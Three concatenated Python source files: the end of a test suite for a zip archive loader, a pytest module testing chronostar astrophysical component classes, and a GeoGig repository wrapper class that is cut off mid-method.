'.hidden-dir/ignored-file',
'%s/VERSION' % root_dir,
'%s/checksums.md5' % root_dir,
'%s/metadata.yaml' % root_dir,
'%s/data/ints.txt' % root_dir,
'%s/provenance/metadata.yaml' % root_dir,
'%s/provenance/VERSION' % root_dir,
'%s/provenance/citations.bib' % root_dir,
'%s/provenance/action/action.yaml' % root_dir
}
observed = set(zf.namelist())
# Not using self.assertArchiveMembers() because it accepts paths
# relative to root_dir, and we have extra paths at the same level
# as root_dir.
self.assertEqual(observed, expected)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
self.assertEqual({str(p.relative_to(archiver.data_dir))
for p in archiver.data_dir.iterdir()},
{'ints.txt'})
def test_load_ignores_directory_members(self):
# Directory members aren't created by Python's zipfile module but can
# be present if the archive is unzipped and then rezipped, for example,
# using a command-line zip program.
fp = os.path.join(self.temp_dir.name, 'archive.zip')
self.archiver.save(fp)
# Add directory entries to the archive.
root_dir = str(self.archiver.uuid)
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('%s/' % root_dir, "")
zf.writestr('%s/data/' % root_dir, "")
zf.writestr('%s/data/nested/' % root_dir, "")
zf.writestr('%s/data/nested/foo.txt' % root_dir, "bar")
# Assert the expected files exist in the archive to verify this test
# case is testing what we want it to.
expected = {
'', # Expected path: `root_dir`/
'data/',
'data/nested/',
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'data/nested/foo.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
archiver = Archiver.load(fp)
self.assertEqual(archiver.uuid, self.archiver.uuid)
self.assertEqual(archiver.type, IntSequence1)
self.assertEqual(archiver.format, IntSequenceDirectoryFormat)
archiver.save(fp)
root_dir = str(archiver.uuid)
expected = {
# Directory entries should not be present.
'VERSION',
'checksums.md5',
'metadata.yaml',
'data/ints.txt',
'data/nested/foo.txt',
'provenance/metadata.yaml',
'provenance/VERSION',
'provenance/citations.bib',
'provenance/action/action.yaml'
}
self.assertArchiveMembers(fp, root_dir, expected)
def test_load_empty_archive(self):
fp = os.path.join(self.temp_dir.name, 'empty.zip')
with zipfile.ZipFile(fp, mode='w') as zf:
pass
with zipfile.ZipFile(fp, mode='r') as zf:
expected = set()
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'visible root directory'):
Archiver.load(fp)
def test_load_dotfile_only_archive(self):
fp = os.path.join(self.temp_dir.name, 'dotfiles-only.zip')
with zipfile.ZipFile(fp, mode='w') as zf:
zf.writestr('.DS_Store', "The world's most beloved file\n")
zf.writestr('.hidden-file',
"You can't see me if I can't see you\n")
zf.writestr('.hidden-dir/ignored-file',
"I'm ignored because I live in a hidden dir :(\n")
with zipfile.ZipFile(fp, mode='r') as zf:
expected = {
'.DS_Store',
'.hidden-file',
'.hidden-dir/ignored-file'
}
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'visible root directory'):
Archiver.load(fp)
def test_load_multiple_root_dirs(self):
fp = os.path.join(self.temp_dir.name, 'multiple-root-dirs.zip')
self.archiver.save(fp)
# Add another semi-valid root dir.
second_root_dir = str(uuid.uuid4())
with zipfile.ZipFile(fp, mode='a') as zf:
zf.writestr('%s/VERSION' % second_root_dir, "foo")
with zipfile.ZipFile(fp, mode='r') as zf:
root_dir = str(self.archiver.uuid)
expected = {
'%s/VERSION' % root_dir,
'%s/checksums.md5' % root_dir,
'%s/metadata.yaml' % root_dir,
'%s/data/ints.txt' % root_dir,
'%s/provenance/metadata.yaml' % root_dir,
'%s/provenance/VERSION' % root_dir,
'%s/provenance/citations.bib' % root_dir,
'%s/provenance/action/action.yaml' % root_dir,
'%s/VERSION' % second_root_dir
}
observed = set(zf.namelist())
self.assertEqual(observed, expected)
with self.assertRaisesRegex(ValueError, 'multiple root directories'):
Archiver.load(fp)
def test_load_invalid_uuid4_root_dir(self):
fp = pathlib.Path(self.temp_dir.name) / 'invalid-uuid4'
zp = pathlib.Path(self.temp_dir.name) / 'bad.zip'
fp.mkdir()
# Invalid uuid4 taken from https://gist.github.com/ShawnMilo/7777304
root_dir = '89eb3586-8a82-47a4-c911-758a62601cf7'
record = _ZipArchive.setup(fp, 'foo', 'bar')
(fp / str(record.uuid)).rename(fp / root_dir)
_ZipArchive.save(fp, zp)
with self.assertRaisesRegex(ValueError,
'root directory.*valid version 4 UUID'):
_ZipArchive(zp)
def test_is_uuid4_valid(self):
uuid_str = str(uuid.uuid4())
self.assertTrue(_ZipArchive._is_uuid4(uuid_str))
def test_parse_uuid_invalid(self):
# Invalid uuid4 taken from https://gist.github.com/ShawnMilo/7777304
uuid_str = '89eb3586-8a82-47a4-c911-758a62601cf7'
self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
# Not a UUID.
uuid_str = 'abc123'
self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
# Other UUID versions.
for uuid_ in (uuid.uuid1(), uuid.uuid3(uuid.NAMESPACE_DNS, 'foo'),
uuid.uuid5(uuid.NAMESPACE_DNS, 'bar')):
uuid_str = str(uuid_)
self.assertFalse(_ZipArchive._is_uuid4(uuid_str))
def test_checksums_match(self):
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added, {})
self.assertEqual(diff.removed, {})
self.assertEqual(diff.changed, {})
def test_checksums_mismatch(self):
with (self.archiver.root_dir / 'data' / 'ints.txt').open('w') as fh:
fh.write('999\n')
with (self.archiver.root_dir / 'tamper.txt').open('w') as fh:
fh.write('extra file')
(self.archiver.root_dir / 'VERSION').unlink()
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added,
{'tamper.txt': '296583001b00d2b811b5871b19e0ad28'})
# The contents of most files is either stochastic, or has the current
# version (which is an unknown commit sha1), so just check name
self.assertEqual(list(diff.removed.keys()), ['VERSION'])
self.assertEqual(diff.changed,
{'data/ints.txt': ('c0710d6b4f15dfa88f600b0e6b624077',
'f47bc36040d5c7db08e4b3a457dcfbb2')
})
def test_checksum_backwards_compat(self):
self.tearDown()
with artifact_version(4):
self.setUp()
diff = self.archiver.validate_checksums()
self.assertEqual(diff.added, {})
self.assertEqual(diff.removed, {})
self.assertEqual(diff.changed, {})
if __name__ == '__main__':
unittest.main()
| |
"""
Tests the inheritance class structure of various
component models
If a new concrete component class has been implemented, simply
import, include in COMPONENT_CLASSES dictionary, and provide
some default parameters in DEFAULT_PARS, and it will
automatically be incorporated into tests, ensuring viable
interface has been implemented correctly.
"""
from __future__ import print_function, division, unicode_literals
import numpy as np
import sys
sys.path.insert(0, '..')
from chronostar.component import SphereComponent, EllipComponent, FreeComponent
import chronostar.traceorbit as torb
# Maps a short label to every concrete component implementation under test.
COMPONENT_CLASSES = {
    'sphere': SphereComponent,
    'ellip': EllipComponent,
    'free': FreeComponent,
    # Insert new implementations here
}

# Shared fixture values: mean, standard deviations, correlations and age used
# to assemble the default parameter vectors below.
MEAN = np.array([0., 1., 2., 3., 4., 5.])
DX = 9.
DY = 12.
DZ = 16.
DU = 3.
DV = 5.
DW = 7.
C_XY = 0.2
C_XZ = -0.9
C_XU = 0.1
C_XV = -0.1
C_XW = 0.4
C_YZ = -0.3
C_YU = 0.1
C_YV = -0.1
C_YW = 0.1
C_ZU = 0.2
C_ZV = 0.1
C_ZW = -0.1
C_UV = 0.1
C_UW = 0.1
# NOTE(review): C_WU names the same U-W pair as C_UW above; its position in
# FREE_PARS suggests the V-W correlation was intended.  The value matches the
# others (0.1) so the fixture is numerically unaffected -- confirm and rename.
C_WU = 0.1
AGE = 20

SPHERE_PARS = np.hstack((MEAN, [DX, DV, AGE]))
ELLIP_PARS = np.hstack((MEAN, [DX, DY, DZ, DV, C_XY, C_XZ, C_YZ, AGE]))
FREE_PARS = np.hstack((MEAN, [DX, DY, DZ, DU, DV, DW,
                              C_XY, C_XZ, C_XU, C_XV, C_XW,
                              C_YZ, C_YU, C_YV, C_YW,
                              C_ZU, C_ZV, C_ZW,
                              C_UV, C_UW,
                              C_WU,
                              AGE]))
DEFAULT_PARS = {
    'sphere': SPHERE_PARS,
    'ellip': ELLIP_PARS,
    'free': FREE_PARS,
    # Insert new default pars here
}
# Orbit integrators available to the components (not exercised directly here).
TRACEORBIT_FUNCS = {
    'galpy': torb.trace_cartesian_orbit,
    'epi': torb.trace_epicyclic_orbit,
}
def test_general_initialisation():
    """Every registered component class picks up mean and age from its pars."""
    for label, cls in COMPONENT_CLASSES.items():
        comp = cls(pars=DEFAULT_PARS[label])
        assert np.allclose(MEAN, comp.get_mean())
        assert comp.get_age() == AGE


def test_spherecomponent_initialisation():
    """SphereComponent exposes its mean, age and isotropic widths."""
    comp = SphereComponent(pars=SPHERE_PARS)
    assert np.allclose(SPHERE_PARS[:6], comp._mean)
    assert np.allclose(AGE, comp._age)
    assert np.isclose(DX, comp.get_sphere_dx())
    assert np.isclose(DV, comp.get_sphere_dv())


def test_ellipcomponent_initialisation():
    """EllipComponent's sphere_dx is the geometric mean of dx, dy, dz."""
    pars = np.copy(ELLIP_PARS)
    pars[10:13] = 0.  # remove correlations for the sphere_dx check
    comp = EllipComponent(pars=pars)
    assert np.allclose(pars[:6], comp._mean)
    assert np.allclose(AGE, comp._age)
    assert np.isclose((DX * DY * DZ) ** (1. / 3), comp.get_sphere_dx())
    assert np.isclose(DV, comp.get_sphere_dv())
def test_generic_externalise_and_internalise():
    """internalise() and externalise() are inverses for every component class."""
    for label, cls in COMPONENT_CLASSES.items():
        comp = cls(pars=DEFAULT_PARS[label])
        emcee_pars = comp.get_emcee_pars()
        internal_pars = comp.internalise(comp.get_pars())
        # emcee pars and internal pars are the same thing (by definition)
        assert np.allclose(emcee_pars, internal_pars)
        assert np.allclose(comp.get_pars(), comp.externalise(internal_pars))


def test_externalise_and_internalise_pars():
    """Check that pars are successfully converted from internal form (used by
    emcee) to external form (interacted with by user) successfully."""
    cases = [(SphereComponent, SPHERE_PARS, slice(6, 8)),
             (EllipComponent, ELLIP_PARS, slice(6, 10))]
    for cls, external_ref, log_slice in cases:
        internal_ref = np.copy(external_ref)
        # The standard-deviation entries are log-transformed internally.
        internal_ref[log_slice] = np.log(internal_ref[log_slice])

        comp = cls(emcee_pars=internal_ref)
        external_pars = comp.get_pars()
        assert np.allclose(external_ref, external_pars)
        assert np.allclose(internal_ref, comp.internalise(external_pars))
def test_simple_projection():
    """
    Check negligible change in mean and covmatrix when projected for a
    negligible timestep.
    """
    tiny_age = 1e-10
    for name, ComponentClass in COMPONENT_CLASSES.items():
        comp = ComponentClass(pars=DEFAULT_PARS[name])
        comp.update_attribute(attributes={'age': tiny_age})
        # Fetch once and reuse: the original stored this in an unused local
        # and then re-evaluated the call inside the assertion.
        cov_mat_now = comp.get_covmatrix_now()
        assert np.allclose(comp.get_mean(), comp.get_mean_now(), atol=1e-8)
        assert np.allclose(comp.get_covmatrix(), cov_mat_now, atol=1e-4)
def test_split_group_age():
    """
    Splitting group by provided ages yields identical initial cov matrix,
    and identical current day mean
    """
    offset = 1.
    for label, cls in COMPONENT_CLASSES.items():
        parent = cls(pars=DEFAULT_PARS[label])
        # Guard against producing a negative age for the younger half
        assert offset < parent._age
        young_age = parent._age - offset
        old_age = parent._age + offset
        young, old = parent.split_group_age(young_age, old_age)
        assert young.get_age() == young_age
        assert old.get_age() == old_age
        # Initial covariance is inherited unchanged by both halves
        assert np.allclose(parent.get_covmatrix(), young.get_covmatrix())
        assert np.allclose(parent.get_covmatrix(), old.get_covmatrix())
        # Present-day means agree to within projection tolerance
        assert np.allclose(parent.get_mean_now(), young.get_mean_now(),
                           atol=1e-4)
        assert np.allclose(parent.get_mean_now(), old.get_mean_now(),
                           atol=1e-4)
def test_load_components():
    """Components survive a store/load round trip, singly and as a list."""
    import os
    # Ensure the scratch directory exists so the stores cannot fail on a
    # fresh checkout (py2/3-safe; exist_ok is py3-only)
    if not os.path.isdir('temp_data'):
        os.makedirs('temp_data')
    single_filename = 'temp_data/single_comp.npy'
    multi_filename = 'temp_data/multi_comp.npy'
    for name, ComponentClass in COMPONENT_CLASSES.items():
        comp0 = ComponentClass(pars=DEFAULT_PARS[name])
        comp1 = ComponentClass(pars=DEFAULT_PARS[name])
        ComponentClass.store_raw_components(single_filename, comp0)
        ComponentClass.store_raw_components(multi_filename, [comp0, comp1])
        single_res = ComponentClass.load_raw_components(single_filename)
        # BUGFIX: compare against comp0 — the component actually stored.
        # The original compared against comp1 and only passed because
        # comp0 and comp1 happen to be constructed identically.
        assert np.allclose(single_res[0].get_pars(), comp0.get_pars())
        multi_res = ComponentClass.load_raw_components(multi_filename)
        assert np.allclose(multi_res[0].get_pars(), comp0.get_pars())
        assert np.allclose(multi_res[1].get_pars(), comp1.get_pars())
def test_init_from_attributes():
    """Constructing from mean+covmatrix attributes reproduces the original pars."""
    near_zero_age = 1e-10
    for label, cls in COMPONENT_CLASSES.items():
        reference = cls(pars=DEFAULT_PARS[label])
        reference.update_attribute(attributes={'age': near_zero_age})
        # Rebuild a component purely from the reference's attributes
        rebuilt = cls(attributes={
            'mean': reference.get_mean(),
            'covmatrix': reference.get_covmatrix(),
        })
        assert np.allclose(reference.get_pars(), rebuilt.get_pars())
        assert np.allclose(reference.get_covmatrix(),
                           rebuilt.get_covmatrix())
def test_get_best_from_chain():
    """get_best_from_chain returns the sample with the highest lnprob."""
    emcee_pars = SphereComponent.internalise(SPHERE_PARS)
    # Fake a chain of 2 walkers x 3 steps, every sample initially identical
    chain = np.array([[emcee_pars] * 3,
                      [emcee_pars] * 3])
    lnprob = np.zeros(chain.shape[:2])
    # Tag one sample so we can recognise it, and give it the best lnprob
    best_ix = (1, 1)
    chain[best_ix][0] = 10.
    lnprob[best_ix] = 1.
    result = SphereComponent.get_best_from_chain(chain, lnprob)
    assert np.allclose(chain[best_ix], result.get_emcee_pars())
def test_comp_with_diff_traceorbitfuncs():
    """Covariance-ellipsoid volume is approximately conserved regardless of
    which orbit-tracing function the SphereComponent is built with."""
    comps = {torb_name: SphereComponent(SPHERE_PARS, trace_orbit_func=torb_func)
             for torb_name, torb_func in TRACEORBIT_FUNCS.items()}
    # Assert covmatrix volume approx constant
    for name, c in comps.items():
        # BUGFIX: the original lines ended with stray trailing commas, which
        # silently wrapped both volumes in 1-tuples. np.isclose still worked
        # elementwise, but the values were not the scalars intended.
        vol_then = np.prod(np.sqrt(np.linalg.eigvalsh(c.get_covmatrix())))
        vol_now = np.prod(np.sqrt(np.linalg.eigvalsh(c.get_covmatrix_now())))
        assert np.isclose(vol_then, vol_now, rtol=0.1)
# Quick manual smoke test when this module is executed directly
if __name__=='__main__':
    test_simple_projection()
| |
import re
from commitish import Commitish
from tag import Tag
import geogig
from geogigexception import GeoGigException
from feature import Feature
from tree import Tree
from utils import mkdir
from py4jconnector import Py4JCLIConnector
from geogigserverconnector import GeoGigServerConnector
import tempfile
import datetime
import re
def _resolveref(ref):
    '''
    Normalises the passed object into a string commit reference
    (a SHA-1, a branch name, or an expression such as HEAD~1).
    All commands that accept references should funnel through this helper,
    so callers may pass plain strings and Commitish objects interchangeably.
    '''
    if ref is None:
        return None
    if isinstance(ref, Commitish):
        return ref.ref
    # Strings pass through untouched; anything else is stringified
    return ref if isinstance(ref, basestring) else str(ref)
# Matches a full 40-hex-digit SHA-1 hash delimited by word boundaries
SHA_MATCHER = re.compile(r"\b([a-f0-9]{40})\b")
class Repository(object):
    """Represents a GeoGig repository and exposes its operations.

    All real work is delegated to a connector object (Py4J CLI connector by
    default); this class resolves references, caches log output, and offers a
    Pythonic facade over the underlying GeoGig commands.
    """
    # Cached result of the last bare log() call; reset via cleancache()
    # whenever an operation may change the history
    _logcache = None
    def __init__(self, url, connector = None, init = False, initParams = None):
        '''
        url: The url of the repository. Only file paths are supported so far. Remote repos are not supported
        connector: the connector to use to communicate with the repository
        init: True if the repository should be initialized
        '''
        self.url = url
        self.connector = Py4JCLIConnector() if connector is None else connector
        if init:
            try:
                mkdir(url)
            except Exception, e:
                raise GeoGigException("Cannot create repository folder.\nCheck that path is correct and you have permission")
        self.connector.setRepository(self)
        # Probe whether the folder is already a geogig repository
        try:
            self.connector.checkisrepo()
            isAlreadyRepo = True
        except GeoGigException, e:
            isAlreadyRepo = False
        if init:
            if isAlreadyRepo:
                raise GeoGigException("Cannot init, the folder is already a geogig repository")
            else:
                self.init(initParams)
        # Final sanity check: by now the folder must be a valid repository
        self.connector.checkisrepo()
        self.cleancache()
    @staticmethod
    def newrepofromclone(url, path, connector = None, username = None, password = None):
        '''
        Clones a given repository into a local folder and returns a repository object representing it
        url: the url of the repo to clone
        path: the path to clone the repo into
        connector: the connector to use to communicate with the repository
        '''
        connector = Py4JCLIConnector() if connector is None else connector
        connector.clone(url, path, username, password)
        return Repository(path, connector)
    def createdat(self):
        '''Returns the creation date of this repository'''
        return self.connector.createdat()
    def cleancache(self):
        # Invalidate the memoised log output; it is refetched lazily by log()
        self._logcache = None
    def description(self):
        '''Returns the description of this repository'''
        #TODO
        return ''
    def revparse(self, rev):
        '''Returns the SHA-1 of a given element, represented as a string'''
        # If the passed string already looks like a full SHA-1, skip the
        # round trip through the connector
        if SHA_MATCHER.match(rev) is not None:
            return rev
        else:
            return self.connector.revparse(rev)
    @property
    def head(self):
        '''Returns a Commitish representing the current HEAD'''
        return self.connector.head()
    @property
    def index(self):
        '''Returns a Commitish representing the index'''
        return Commitish(self, geogig.STAGE_HEAD)
    @property
    def workingtree(self):
        '''Returns a Commitish representing workingtree'''
        return Commitish(self, geogig.WORK_HEAD)
    @property
    def master(self):
        '''Returns a Commitish representing the master branch'''
        return Commitish(self, geogig.MASTER)
    def isdetached(self):
        '''Returns true if the repos has a detached HEAD'''
        # On a detached HEAD the symbolic ref resolves to the commit id itself
        return self.head.id == self.head.ref
    def synced(self, branch = geogig.HEAD, credentials = None):
        '''
        Returns a tuple with number of (ahead, behind) commits between this repo and a remote
        It uses the passed branch or, if not passed, the current branch
        If the repository is headless, or if not remote is defined, it will throw an exception
        It uses the "origin" remote if it exists, otherwise it uses the first remote available.
        If the remote requires authentication, a tuple of (username,password) must be passed
        in the credentials parameter
        '''
        if (branch == geogig.HEAD and self.isdetached()):
            raise GeoGigException("Cannot use current branch. The repository has a detached HEAD")
        remotes = self.remotes
        if remotes:
            # Prefer "origin"; otherwise fall back to the first remote defined
            if "origin" in remotes:
                remote = remotes["origin"]
                remotename = "origin"
            else:
                remotename = remotes.keys()[0]
                remote = remotes.values()[0]
        else:
            raise GeoGigException("No remotes defined")
        if isremoteurl(remote):
            repo = Repository(remote, GeoGigServerConnector(credentials))
        else:
            # Local remote: strip the "file:/" scheme and reuse our connector type
            conn = self.connector.__class__()
            repo = Repository(remote[len("file:/"):], conn)
        localtip = self.revparse(branch)
        remotetip = repo.revparse(branch)
        if remotetip == localtip:
            return 0, 0
        if remotetip == geogig.NULL_ID:
            # Remote branch does not exist yet: every local commit is pushable
            log = self.log(branch)
            push = len(log)
            pull = 0
        else:
            # Count commits on each side since the tracked branch head
            trackedbranchhead = self.revparse("refs/remotes/" + remotename + "/" + branch)
            log = self.log(branch, trackedbranchhead)
            push = len(log)
            log = repo.log(branch, trackedbranchhead)
            pull = len(log)
        return push, pull
    def mergemessage(self):
        '''
        Return the merge message if the repo is in a merge operation stopped due to conflicts.
        Returns an empty string if it is not the case
        '''
        return self.connector.mergemessage()
    def log(self, tip = None, sincecommit = None, until = None, since = None, path = None, n = None):
        '''
        Returns a list of Commit starting from the passed tip ref, or HEAD if there is no passed ref,
        and up to the sincecommit, if passed, or to first commit in the history if not.
        If a path is passed, it only returns commits in which that path was modified
        Date limits can be passed using the since and until parameters
        A maximum number of commits can be set using the n parameter
        '''
        tip = tip or geogig.HEAD
        # Only the unfiltered HEAD log is cached; any filter bypasses the cache
        if path is not None or tip != geogig.HEAD or n is not None or since is not None or until is not None or sincecommit is not None:
            return self.connector.log(_resolveref(tip), _resolveref(sincecommit), _resolveref(until), _resolveref(since), path, n)
        if self._logcache is None:
            self._logcache = self.connector.log(_resolveref(tip), _resolveref(sincecommit), _resolveref(until), _resolveref(since), path, n)
        return self._logcache
    def commitatdate(self, t):
        '''Returns a Commit corresponding to a given instant, which is passed as a datetime.datetime'''
        # Convert the datetime to milliseconds since the Unix epoch, as
        # expected by the connector's `until` parameter
        epoch = datetime.datetime.utcfromtimestamp(0)
        delta = t - epoch
        milisecs = int(delta.total_seconds()) * 1000
        log = self.connector.log(geogig.HEAD, until = str(milisecs), n = 1)
        if log:
            return log[0]
        else:
            raise GeoGigException("Invalid date for this repository")
    @property
    def trees(self):
        # Convenience accessor: non-recursive trees at HEAD root
        return self._trees()
    def _trees(self, ref = geogig.HEAD, path = None, recursive = False):
        '''Returns a set of Tree objects with all the trees for the passed ref and path'''
        return [e for e in self.children(ref, path, recursive) if isinstance(e, Tree)]
    def features(self, ref = geogig.HEAD, path = None, recursive = False):
        '''Returns a set of Feature objects with all the features for the passed ref and path'''
        return [e for e in self.children(ref, path, recursive) if isinstance(e, Feature)]
    def children(self, ref = geogig.HEAD, path = None, recursive = False):
        '''Returns a set of Tree and Feature objects with all the children for the passed ref and path'''
        return self.connector.children(_resolveref(ref), path, recursive)
    @property
    def branches(self):
        ''' Returns a dict with branch names as keys and branch refs as values'''
        return self.connector.branches()
    @property
    def tags(self):
        '''Returns a dict with tag names as keys and tag objects as values'''
        tags = self.connector.tags()
        tags = {k:Tag(self, v, k) for k, v in tags.iteritems()}
        return tags
    def clone(self, path):
        '''Clones this repo in the specified path. Returns a reference to the cloned repo'''
        # Normalise Windows-style separators before handing the url over
        url = self.url.replace('\\', '/')
        self.connector.clone(url, path)
        return Repository(path, self.connector.__class__(), False)
    def createbranch(self, ref, name, force = False, checkout = False):
        '''Creates a new branch in the repo. Returns the commitish representing the branch'''
        # Checking out the new branch moves HEAD, so the log cache is stale
        if checkout:
            self.cleancache()
        return self.connector.createbranch(_resolveref(ref), name, force, checkout)
    def deletebranch(self, name):
        '''Deletes the passed branch'''
        self.connector.deletebranch(name)
    def createtag(self, ref, name, message):
        '''Creates a new tag, with the passed message'''
        self.connector.createtag(_resolveref(ref), name, message)
    def deletetag(self, name):
        '''Deletes the passed tag'''
        self.connector.deletetag(name)
    def diff(self, refa = geogig.HEAD, refb = geogig.WORK_HEAD, path = None):
        '''Returns a list of DiffEntry representing the changes between 2 commits.
        If a path is passed, it only shows changes corresponding to that path'''
        return self.connector.diff(_resolveref(refa), _resolveref(refb), path)
    def difftreestats(self, refa = geogig.HEAD, refb = geogig.WORK_HEAD):
        '''Returns a dict with tree changes statistics for the passed refs. Keys are paths, values are tuples
        in the form (added, deleted, modified) corresponding to changes made to that path'''
        return self.connector.difftreestats(_resolveref(refa), _resolveref(refb))
    def treediff(self, path, refa = geogig.HEAD, refb = geogig.WORK_HEAD):
        '''Returns a tuple attributes, features with a description of features changed between the specified refs
        Attributes is a dict with attribute names as keys and the description of the attribute as value
        Features is a list, with each element being another list representing a feature and the changes
        in it between the two specifed versions.
        The length of this list is the same as the one of attributes dictionary
        The value for an attribute is a tuple of (change_type, old value, new value) in case the change for the
        attribute is a modification, or (change_type, value), if the change is a removal, addition or
        unmodified'''
        return self.connector.treediff(path, _resolveref(refa), _resolveref(refb))
    def unstaged(self):
        '''Returns a list of diffEntry with the differences between staging area and working tree'''
        return self.diff(geogig.STAGE_HEAD, geogig.WORK_HEAD);
    def staged(self):
        '''Returns a list of diffEntry with the differences between HEAD and Staging area'''
        return self.diff(geogig.HEAD, geogig.STAGE_HEAD);
    def notindatabase(self):
        '''Returns a list of diffEntry with the differences between HEAD and Working Tree'''
        return self.diff(geogig.HEAD, geogig.WORK_HEAD);
    def conflicts(self):
        '''Returns a dict of tuples. Keys are paths, values are tuples with the 3 versions
        defining a conflict, as Feature objects'''
        conflicts = {}
        _conflicts = self.connector.conflicts()
        for path, c in _conflicts.iteritems():
            # Wrap each of the (ancestor, ours, theirs) refs as Feature objects
            c = tuple(Feature(self, ref, path) for ref in c)
            conflicts[path] = c
        return conflicts
    def checkout(self, ref, paths = None, force = False):
        '''Checks out the passed ref into the working tree.
        If a path list is passed, it will just checkout those paths.
        If force is True, it will check out even if the working tree is not clean'''
        self.connector.checkout(_resolveref(ref), paths, force)
        self.cleancache()
    def updatepathtoref(self, ref, paths):
        '''
        Updates the element in the passed paths to the version corresponding to the passed ref.
        If the path is conflicted (unmerged), it will also resolve the conflict
        '''
        ref = _resolveref(ref)
        # Reset each path first so a conflicted entry can be checked out cleanly
        for path in paths:
            self.connector.reset(ref, path = path)
        return self.connector.checkout(ref, paths)
    def solveconflict(self, path, attributes):
        '''
        Solves a conflict at the specified path with a new feature defined by the passed attributes.
        Attributes are passed in a dict with attribute names as keys and attribute values as values.
        This can be used only with features containing one and only one geometry attribute
        '''
        self.reset(geogig.HEAD, path = path)
        self.insertfeature(path, attributes)
        self.add([path])
    def solveconflicts(self, paths, version = geogig.OURS):
        '''
        Solves the specified paths with one of the corresponding existing versions (ours or theirs)
        Version is specified using geogig.OURS or geogig.THEIRS
        '''
        self.connector.solveconflicts(paths, version)
    def add(self, paths = []):
        '''Adds the passed paths to the staging area. If no paths are passed, it will add all the unstaged ones'''
        # NOTE(review): mutable default argument; safe only while the
        # connector never mutates the list — TODO confirm
        self.connector.add(paths)
    def addandcommit(self, message, paths = []):
        # Convenience wrapper: stage then commit the same set of paths
        self.add(paths)
        return self.commit(message, paths)
    def commit(self, message, paths = []):
        '''
        Creates a new commit with the changes in the specified paths.
        If no paths are passed, it will commit all staged features
        Raises an UnconfiguredUserException if there is no user configured and it cannot commit
        '''
        self.connector.commit(message, paths)
        self.cleancache()
        #TODO: maybe add the commit instead of invalidating the whole cache
    def blame(self, path):
        '''
        Returns authorship information for the passed path
        It is returned as a dict, with attribute names as keys.
        Values are tuples of (value, commitid, authorname)
        '''
        return self.connector.blame(path)
    def count(self, ref, path):
        '''Returns the count of objects in a given path'''
        # NOTE(review): parses the count from the second line of `show`
        # output, skipping a 5-character prefix — assumes a fixed output
        # format from the connector; confirm against geogig show output
        output = self.show(_resolveref(ref) + ":" + path)
        return int(output.split("\n")[1][5:].strip())
    def feature(self, ref, path):
        '''Returns a Feature object corresponding to the passed ref and path'''
        return Feature(self, ref, path)
    def featuredata(self, ref, path):
        '''
        Returns the attributes of a given feature, as a dict with attributes
        names as keys and tuples of (attribute_value, attribute_type_name) as values.
        Values are converted to appropriate types when possible, otherwise they are stored
        as the string representation of the attribute
        '''
        data = self.connector.featuredata(_resolveref(ref), path)
        if len(data) == 0:
            raise GeoGigException("The specified feature does not exist")
        return data
    def featuretype(self, ref, tree):
        '''Returns the featuretype of a tree as a dict in the form attrib_name : attrib_type_name'''
        return self.connector.featuretype(ref, tree)
    def versions(self, path):
        '''
        Returns all versions os a given feature.
        It returns a dict with Commit objects as keys, and feature data for the corresponding
        commit as values. Feature data is another dict with attributes
        names as keys and tuples of (attribute_value, attribute_type_name) as values.
        Values are converted to appropriate types when possible, otherwise they are stored
        as the string representation of the attribute
        '''
        # One "ref:path" string per commit that touched the path
        entries = self.log(geogig.HEAD, path = path)
        refs = [entry.ref + ":" + path for entry in entries]
        versions = []
        if refs:
            # Batch-fetch the feature data for every version at once
            features = self.connector.featuresdata(refs)
            for entry, ref in zip(entries, refs):
                versions.append((entry, features[ref]))
        return versions
    def featurediff(self, ref, ref2, path):
        '''
        Returns a dict with attributes that have changed in the specified feature path between the specified refs
        Keys are attribute names. Values are tuples of "(oldvalue, newvalue)"
        If the feature has been added, oldvalue = None
        If the feature has been removed, newvalue = None
        Values are converted to appropriate types if possible, otherwise they are stored as strings
        '''
        return self.connector.featurediff(_resolveref(ref), _resolveref(ref2), path)
    def reset(self, ref, mode = geogig.RESET_MODE_HARD, path = None):
        '''Resets the current branch to the passed reference'''
        self.connector.reset(ref, mode, path)
        self.cleancache()
    def exportshp(self, ref, path, shapefile):
        # Export the given tree at the given ref to a shapefile
        self.connector.exportshp(_resolveref(ref), path, shapefile)
    def exportsl(self, ref, path, database, user = None, table = None):
        '''Export to a SpatiaLite database'''
        self.connector.exportsl(_resolveref(ref), path, database, user, table)
    # ADDED
    def exportgeojson(self, ref, path, geojson):
        # Export the given tree at the given ref to a GeoJSON file
        self.connector.exportgeojson(_resolveref(ref), path, geojson)
    def exportpg(self, ref, path, table, database, user, password = None, schema = None, host = None, port = None, overwrite = False):
        # Export the given tree at the given ref to a PostGIS table
        self.connector.exportpg(_resolveref(ref), path, table, database, user, password, schema, host, port, overwrite)
    def importgeojson(self, geojsonfile, add = False, dest = None, idAttribute = None, geomName = None, force = False):
        # Import features from a GeoJSON file into the working tree
        self.connector.importgeojson(geojsonfile, add, dest, idAttribute, geomName, force)
    def importshp(self, shpfile, add = False, dest = None, idAttribute = None, force = False):
        # Import features from a shapefile into the working tree
        self.connector.importshp(shpfile, add, dest, idAttribute, force)
    def importpg(self, database, user = None, password = None, table = None, schema = None,
                 host = None, port = None, add = False, dest = None, force = False, idAttribute = None):
        # Import features from a PostGIS table into the working tree
        self.connector.importpg(database, user, password, table,
                                schema, host, port, add, dest, force, idAttribute)
    def importsl(self, database, table, add = False, dest = None):
        # Import features from a SpatiaLite database into the working tree
        self.connector.importsl(database, table, add, dest)
    def exportdiffs(self, commit1, commit2, path, filepath, old = False, overwrite = False):
        '''Exports the differences in a given tree between to commits, creating a shapefile
        with the changed features corresponding to the newest of them, or the oldest if old = False'''
        self.connector.exportdiffs(_resolveref(commit1), _resolveref(commit2), path, filepath, old, overwrite)
    def insertfeature(self, path, attributes):
        '''
        Inserts a feature to the working tree.
